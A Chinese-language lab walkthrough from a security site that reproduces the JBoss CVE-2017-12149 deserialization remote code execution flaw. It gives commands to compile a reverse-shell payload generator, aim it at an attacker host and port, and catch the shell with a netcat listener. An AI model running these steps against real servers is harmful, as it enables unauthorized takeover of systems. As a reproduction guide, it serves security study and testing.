menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-反序列化漏洞 chevron_right 004-CVE-2017-12149 JBosS AS 6.X 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-CVE-2017-12149 JBosS AS 6.X 反序列化漏洞.md
    1.14 KB / 2021-07-17 00:01:32
        # CVE-2017-12149 JBosS AS 6.X 反序列化漏洞
    
    ### 一、漏洞简介
    
    JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。
    
    ### 二、漏洞影响
    
    JBoss 5.x - 6.x
    
    ### 三、复现过程
    
    win7一台,ip为 172.26.1.125(靶机,安装了java环境)
    
    kali一台,ip为 192.168.1.192(攻击机)
    
    ![](images/15890731008817.png)
    
    
    进入攻击机kali,下载反序列化工具:https://github.com/ianxtianxt/CVE-2015-7501/
    
    解压完,进入到这个工具目录 执行命令:`javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java`
    
    继续执行命令:
    
    
    ```
    java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.73.131:4444(IP是攻击机ip,4444是要监听的端口) 
    ```
    
    新界面开启nc准备接收反弹过来的shell。命令:`nc -lvnp 4444`
    
    这个时候在这个目录下生成一个ReverseShellCommonsCollectionsHashMap.ser文件,然后我们curl就能反弹shell了
    
    ![](images/15890731356862.png)
    
    
    ![](images/15890731392788.png)
    
    
    links
    file_download